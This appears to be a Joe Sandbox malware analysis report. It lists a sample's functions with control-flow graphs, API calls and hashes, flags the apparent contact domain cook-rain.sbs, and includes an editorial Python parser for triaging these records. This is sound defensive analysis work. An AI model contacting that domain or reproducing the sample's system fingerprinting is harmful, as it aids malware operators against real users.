                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8I>O$;IJK$;M|C$<=$@A$C1D7$C5+K$H=K3$V%C;$]!S'$_-_#$_9_?$YW
                                                                              • API String ID: 0-1278073768
                                                                              • Opcode ID: 2281caa824884cecce71a7c3fa33d0f3ad78d79b3bda594c1e4d6be36a95747f
                                                                              • Instruction ID: 81a4e0f88af187592407e4d0caffea0f58f4d6db93f93ad7450970862e33cbb7
                                                                              • Opcode Fuzzy Hash: 2281caa824884cecce71a7c3fa33d0f3ad78d79b3bda594c1e4d6be36a95747f
                                                                              • Instruction Fuzzy Hash: EDF1DCB110C3408FE315DF24D89166BBBE4FF86349F15892CE9D98B2A0E774C949CB96

                                                                              Control-flow Graph: function 369310 (graph omitted)
                                                                              APIs
                                                                              • SysAllocString.OLEAUT32(81578756), ref: 003694A5
                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 003694E9
                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,116B1F3B,00000000,00000000,00000000,00000000), ref: 0036999D
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AllocBlanketInformationProxyStringVolume
                                                                              • String ID: ()$0}bc$\
                                                                              • API String ID: 2230333033-1331217852
                                                                              • Opcode ID: ab3e044e9b209ed0bae1734552e6afcd951793ba85519a33210b3b8a4bf9d127
                                                                              • Instruction ID: 7dee717ba75e8d60522dfde05dcd77f8f08b12bcd94d127b6527f78fde26d984
                                                                              • Opcode Fuzzy Hash: ab3e044e9b209ed0bae1734552e6afcd951793ba85519a33210b3b8a4bf9d127
                                                                              • Instruction Fuzzy Hash: CC227272A083019FD725CF24CC85B6BBBEAEBC6310F19891DF4859B281D7B0D905CB92

                                                                              Control-flow Graph: function 352ba0 (graph omitted)
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !@$"$,$A$D$E$J$K$L$w
                                                                              • API String ID: 0-3285155985
                                                                              • Opcode ID: b3275968512b88a4475127c548a23a8c195f6f402df0edfda609f612003e0fc7
                                                                              • Instruction ID: afe10d49067b1be2fca3bdf4e3239aa06a29ed716cfa892659b203e1251156fd
                                                                              • Opcode Fuzzy Hash: b3275968512b88a4475127c548a23a8c195f6f402df0edfda609f612003e0fc7
                                                                              • Instruction Fuzzy Hash: C142257260C7808BD3368B28C89176FBBE1ABD6354F18892DE9D5C73E1D77889498743

                                                                              Control-flow Graph: function 33cef5 (graph omitted)
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: +"#R$-0p#$.$["$39my$6(S"$8C76D044CA0F3E1063CFCF7E6C45F838$^GFA$c^.z$cook-rain.sbs$~sx=
                                                                              • API String ID: 0-3077670400
                                                                              • Opcode ID: 8ec76324e5676f1ef683a9200013747d8c121f478f1e11202001c5686e346301
                                                                              • Instruction ID: e6d3e5415d27e3b2561c5f1b51de72c6b87a64dc711e2e11c89e94907b4f1001
                                                                              • Opcode Fuzzy Hash: 8ec76324e5676f1ef683a9200013747d8c121f478f1e11202001c5686e346301
                                                                              • Instruction Fuzzy Hash: A3A1D17058C3C28FD33A8F2595917EBBBE1ABA2314F18997CC0D98B245DB7904068B93

                                                                              Control-flow Graph

                                                                              control_flow_graph 363 33dcb7-33dcf6 call 363e90 call 339dc0 CoUninitialize 368 33dd00-33dd19 363->368 368->368 369 33dd1b-33dd3b 368->369 370 33dd40-33dd64 369->370 370->370 371 33dd66-33dddf 370->371 372 33dde0-33ddfd 371->372 372->372 373 33ddff-33de10 372->373 374 33de12-33de19 373->374 375 33de2b-33de33 373->375 376 33de20-33de29 374->376 377 33de35-33de36 375->377 378 33de4b-33de58 375->378 376->375 376->376 381 33de40-33de49 377->381 379 33de7b-33de87 378->379 380 33de5a-33de61 378->380 383 33de9b-33dea5 379->383 384 33de89-33de8a 379->384 382 33de70-33de79 380->382 381->378 381->381 382->379 382->382 386 33dea7-33deab 383->386 387 33debb-33dec7 383->387 385 33de90-33de99 384->385 385->383 385->385 388 33deb0-33deb9 386->388 389 33dee1-33e025 387->389 390 33dec9-33decb 387->390 388->387 388->388 392 33e030-33e07b 389->392 391 33ded0-33dedd 390->391 391->391 393 33dedf 391->393 392->392 394 33e07d-33e0a8 392->394 393->389 395 33e0b0-33e0d5 394->395 395->395 396 33e0d7-33e123 call 33bdb0 395->396
                                                                              APIs
                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Uninitialize
                                                                              • String ID: $#$@KFQ$cook-rain.sbs$_Q
                                                                              • API String ID: 3861434553-3915531445
                                                                              • Opcode ID: 34c59f9cf54f2a4c6e04ef3a0ee9776ebd3e4c1a83a3e3e7edcd606622491926
                                                                              • Instruction ID: e715ec242d921dbf68173aaaf1b340b8c8216ae6a9c9c950afbe2a7f9a78e714
                                                                              • Opcode Fuzzy Hash: 34c59f9cf54f2a4c6e04ef3a0ee9776ebd3e4c1a83a3e3e7edcd606622491926
                                                                              • Instruction Fuzzy Hash: E0B1AB7510D3C28BD3368B2594917EBFFE2AFE6304F19996CE0C94B242D778450ACB92

                                                                              Control-flow Graph

                                                                              control_flow_graph 399 33bdb0-33c00f 400 33c010-33c02c 399->400 400->400 401 33c02e-33c03a 400->401 402 33c03d-33c061 401->402
                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: AK$J's)$m?i!$u#{%$~+*-$[:]
                                                                              • API String ID: 0-2167574748
                                                                              • Opcode ID: 866f3ff8e5c8ee38cf93b571e3e07028073a50446865a7e797bc768730d8b381
                                                                              • Instruction ID: 5b05cd81ac817d85c1fee88b3a9ae931e9afaf9e358e80776c27bdfda470a24c
                                                                              • Opcode Fuzzy Hash: 866f3ff8e5c8ee38cf93b571e3e07028073a50446865a7e797bc768730d8b381
                                                                              • Instruction Fuzzy Hash: A651EDB45593848BE3748F118482B8FBBB1FB91300F508A1CE2D86B794CBB84446CF57

                                                                              Control-flow Graph

                                                                              control_flow_graph 453 371160-37117f 454 371180-371189 453->454 454->454 455 37118b-371201 454->455 456 371210-37123a 455->456 456->456 457 37123c-371247 456->457 458 371295-37129c 457->458 459 371249-371251 457->459 460 371260-371268 459->460 461 371271-371277 460->461 462 37126a-37126d 460->462 461->458 464 371279-37128d call 36e470 461->464 462->460 463 37126f 462->463 463->458 466 371292 464->466 466->458
                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: @$P?l1
                                                                              • API String ID: 2994545307-4135037845
                                                                              • Opcode ID: 5b3ca3d8232ebef28f4357f0f448f848c6b69d6d27dbb6642dcde1d92c1d1810
                                                                              • Instruction ID: f5a4fa93b92cafb2cb4a1cdfb29a53417af3f5a22a8dc5919d0414d2c02d44de
                                                                              • Opcode Fuzzy Hash: 5b3ca3d8232ebef28f4357f0f448f848c6b69d6d27dbb6642dcde1d92c1d1810
                                                                              • Instruction Fuzzy Hash: D03102722083049FC325DF58C4C162BBBF8FF99354F159C2DEA898B291D3799908CB96

                                                                              Control-flow Graph

                                                                              control_flow_graph 467 338f20-338f31 call 36ced0 470 338f37-338f4f call 366070 467->470 471 339146-33914f ExitProcess 467->471 475 339141 call 36e3b0 470->475 476 338f55-338f7b 470->476 475->471 480 338f81-339034 476->480 481 338f7d-338f7f 476->481 483 33903a-3390aa 480->483 484 3390d9-339135 call 33a2f0 480->484 481->480 485 3390b0-3390d7 483->485 486 3390ac-3390ae 483->486 484->475 489 339137 call 33ce90 484->489 485->484 486->485 491 33913c call 33bd80 489->491 491->475
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(00000000), ref: 00339149
                                                                                • Part of subcall function 0033BD80: FreeLibrary.KERNEL32(00339141), ref: 0033BD86
                                                                                • Part of subcall function 0033BD80: FreeLibrary.KERNEL32 ref: 0033BDA7
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary$ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 1614911148-0
                                                                              • Opcode ID: 5fc0ea29a1fab4a30edf88de932a1b13e4ed9a172ae28c75c43ae8e81f8428fe
                                                                              • Instruction ID: 5cacd571ca7c58d4dac2cae55682c8f9ec5004eddfb45ef8e237136542e9c9d8
                                                                              • Opcode Fuzzy Hash: 5fc0ea29a1fab4a30edf88de932a1b13e4ed9a172ae28c75c43ae8e81f8428fe
                                                                              • Instruction Fuzzy Hash: F85199B7B843054BD318AAA68CC23ABF9978BC4314F0FA43D5980DB381EEB99C0541D0
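The records on this page are machine-readable: each control_flow_graph line lists numbered basic blocks with their address ranges, the call targets and imported APIs reached from each block, and the edges between blocks, and each Similarity block's String ID field lists the strings the function references, joined with $. The Python below is an editorial example added to this page, not code from Joe Sandbox or its IDA plugin. It parses both fields so that a function's entry address, imported API calls, subroutine targets and terminal blocks can be pulled out for triage. The sample inputs are copied from this page (the ExitProcess record at 0x338f20 and the String ID values of the 0x33cef5 and 0x33dcb7 records); the token grammar and the domain and hex-blob heuristics are this example's own reading of the format, and because the report joins strings with $, any string that itself contains $ cannot be recovered exactly.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# Token shapes in a "control_flow_graph" line: "<id> <start>[-<end>]" opens a basic block (a lone
# address is a one-instruction block), "call <addr>" is a subroutine call made from that block,
# a bare name is an imported API called from it, and "<a>-><b>" is an edge between blocks.
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_RE = re.compile(r"^\d+$")
RANGE_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")
HEX_RE = re.compile(r"^[0-9a-f]+$")
# Triage heuristics for the "String ID" list (this example's assumptions, not the report's):
# hostname-shaped strings, and 32/40/64-character hex blobs that deserve a second look.
DOMAIN_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}$", re.IGNORECASE)
HEXBLOB_RE = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$", re.IGNORECASE)


@dataclass
class BasicBlock:
    node_id: int
    start: int
    end: int
    calls: List[int] = field(default_factory=list)  # subroutine targets ("call 36e470")
    apis: List[str] = field(default_factory=list)   # imported APIs named on the block


@dataclass
class FunctionGraph:
    blocks: Dict[int, BasicBlock]
    edges: List[Tuple[int, int]]

    @property
    def entry(self) -> int:
        return min(b.start for b in self.blocks.values())

    def apis(self) -> Set[str]:
        return {a for b in self.blocks.values() for a in b.apis}

    def calls(self) -> Set[int]:
        return {c for b in self.blocks.values() for c in b.calls}

    def sinks(self) -> Set[int]:
        # Blocks with no outgoing edge: where the function returns or terminates the process.
        sources = {src for src, _ in self.edges}
        return {n for n in self.blocks if n not in sources}


def parse_cfg(line: str) -> FunctionGraph:
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks: Dict[int, BasicBlock] = {}
    edges: List[Tuple[int, int]] = []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        if tok == "call":
            if current is None or i + 1 >= len(tokens) or not HEX_RE.match(tokens[i + 1]):
                raise ValueError(f"malformed call at token {i}")
            current.calls.append(int(tokens[i + 1], 16))
            i += 2
            continue
        rng = RANGE_RE.match(tokens[i + 1]) if NODE_RE.match(tok) and i + 1 < len(tokens) else None
        if rng:
            start = int(rng.group(1), 16)
            end = int(rng.group(2), 16) if rng.group(2) else start
            current = BasicBlock(int(tok), start, end)
            blocks[current.node_id] = current
            i += 2
            continue
        if current is None:
            raise ValueError(f"API name {tok!r} before any block")
        current.apis.append(tok)  # anything else is an imported API name on the current block
        i += 1
    return FunctionGraph(blocks, edges)


def split_string_id(value: str) -> List[str]:
    # "$" is the report's separator, so a literal "$" inside a string is indistinguishable from it.
    return [s for s in value.split("$") if s]


def triage_strings(strings: List[str]) -> Dict[str, List[str]]:
    return {
        "domains": [s for s in strings if DOMAIN_RE.match(s)],
        "hex_blobs": [s for s in strings if HEXBLOB_RE.match(s)],
    }


# Copied from this page: the complete control_flow_graph line of the ExitProcess function at
# 0x338f20, and the String ID values of the 0x33cef5 and 0x33dcb7 records.
CFG_EXIT = ("control_flow_graph 467 338f20-338f31 call 36ced0 470 338f37-338f4f call 366070 467->470 "
            "471 339146-33914f ExitProcess 467->471 475 339141 call 36e3b0 470->475 476 338f55-338f7b "
            "470->476 475->471 480 338f81-339034 476->480 481 338f7d-338f7f 476->481 483 33903a-3390aa "
            "480->483 484 3390d9-339135 call 33a2f0 480->484 481->480 485 3390b0-3390d7 483->485 "
            "486 3390ac-3390ae 483->486 484->475 489 339137 call 33ce90 484->489 485->484 486->485 "
            "491 33913c call 33bd80 489->491 491->475")
STRING_ID_A = r'+"#R$-0p#$.$["$39my$6(S"$8C76D044CA0F3E1063CFCF7E6C45F838$^GFA$c^.z$cook-rain.sbs$~sx='
STRING_ID_B = "$#$@KFQ$cook-rain.sbs$_Q"
```

Run against the ExitProcess record, parse_cfg reports 13 blocks and 18 edges with a single sink, block 471, which is the block that names ExitProcess, so every path through that function ends by terminating the process; its six subroutine targets (36ced0, 366070, 36e3b0, 33a2f0, 33ce90, 33bd80) include 33bd80, whose FreeLibrary calls the APIs list above attributes to a subcall. The string triage flags cook-rain.sbs, which appears in the String ID of two function records on this page and can be checked against the report's network section, and a 32-character hex string whose role the report does not state.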

                                                                              Control-flow Graph

                                                                              control_flow_graph 493 357e50-357e78 494 357e80-357e9f 493->494 494->494 495 357ea1-357ead 494->495 496 357ef4-357f05 495->496 497 357eaf-357eb7 495->497 499 357f10-357f39 496->499 498 357ec0-357ec7 497->498 500 357ed0-357ed6 498->500 501 357ec9-357ecc 498->501 499->499 502 357f3b-357f3f 499->502 500->496 506 357ed8-357eec call 36e470 500->506 501->498 505 357ece 501->505 503 357f41-357f6f call 36ba10 502->503 504 357fc0-357fc2 502->504 512 357f70-357f8f 503->512 508 3582bf-3582c8 504->508 505->496 511 357ef1 506->511 511->496 512->512 513 357f91-357f9d 512->513 514 357fe6-357fea 513->514 515 357f9f-357fa7 513->515 517 3582b6-3582bc call 36bab0 514->517 518 357ff0-357ff9 514->518 516 357fb0-357fb7 515->516 521 357fc7-357fcd 516->521 522 357fb9-357fbc 516->522 517->508 519 358000-358015 518->519 519->519 523 358017-358019 519->523 521->514 526 357fcf-357fde call 36e470 521->526 522->516 525 357fbe 522->525 527 358020-35802e call 3386e0 523->527 528 35801b 523->528 525->514 531 357fe3 526->531 533 358040-35804a 527->533 528->527 531->514 534 358030-35803e 533->534 535 35804c-35804f 533->535 534->533 536 358063-35806a 534->536 537 358050-35805f 535->537 539 358070-35807b 536->539 540 3582ad-3582b3 call 3386f0 536->540 537->537 538 358061 537->538 538->534 542 35807d-358087 539->542 543 3580cb-3580e4 call 3386e0 539->543 540->517 546 3580a6-3580aa 542->546 552 358224-35824f 543->552 553 3580ea-3580f0 543->553 547 358090-358098 546->547 548 3580ac-3580b5 546->548 554 35809b-3580a4 547->554 550 3580b7-3580ba 548->550 551 3580c0-3580c4 548->551 550->554 551->554 555 3580c6-3580c9 551->555 557 358250-358285 552->557 553->552 556 3580f6-3580ff 553->556 554->543 554->546 555->554 558 358100-35810a 556->558 557->557 559 358287-3582aa call 3395f0 call 3386f0 557->559 560 358120-358125 558->560 561 35810c-358111 558->561 559->540 564 358127-35812a 560->564 565 358150-358162 560->565 563 3581c0-3581c6 
561->563 570 3581c8-3581ce 563->570 564->565 571 35812c-35814b 564->571 567 358164-358167 565->567 568 3581da-3581e3 565->568 567->568 572 358169-3581ba 567->572 575 3581e5-3581eb 568->575 576 3581ed-3581f0 568->576 570->552 574 3581d0-3581d2 570->574 571->563 572->563 574->558 577 3581d8 574->577 575->570 578 3581f2-35821a 576->578 579 35821c-358222 576->579 577->552 578->563 579->563
                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: KJML
                                                                              • API String ID: 2994545307-719402181
                                                                              • Opcode ID: 4613f91795aaf5dbf4fd8fe6ac8b54a8000bce4106cef5a08aef20294165e5d4
                                                                              • Instruction ID: 06d246b73e97a188bf93669c2699e25270b2d886147eee3ee8fe294c4cf55751
                                                                              • Opcode Fuzzy Hash: 4613f91795aaf5dbf4fd8fe6ac8b54a8000bce4106cef5a08aef20294165e5d4
                                                                              • Instruction Fuzzy Hash: B2C16D71A087018BD725CF24DC81B7BB796EB95311F1A852CEC869B3A1EA35DC0EC791

                                                                              Control-flow Graph

                                                                              control_flow_graph 586 36e470-36e4a2 LdrInitializeThunk
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(0034173D), ref: 0036E49E
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 3q4
                                                                              • API String ID: 0-3801341962
                                                                              • Opcode ID: f44a3df0b564d6840f1e484b5b5e461852a2e794dc09cf3862eb9b8aae9869c5
                                                                              • Instruction ID: bd12a9551e7053e626ea5e7be6a2e295320d898d79c0d39e2f9f6c903e327bbd
                                                                              • Opcode Fuzzy Hash: f44a3df0b564d6840f1e484b5b5e461852a2e794dc09cf3862eb9b8aae9869c5
                                                                              • Instruction Fuzzy Hash: 4D412470608341AFE312DF64DC96A5B7BE8EB89315F04883CF688CA251DB34D5498B93
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
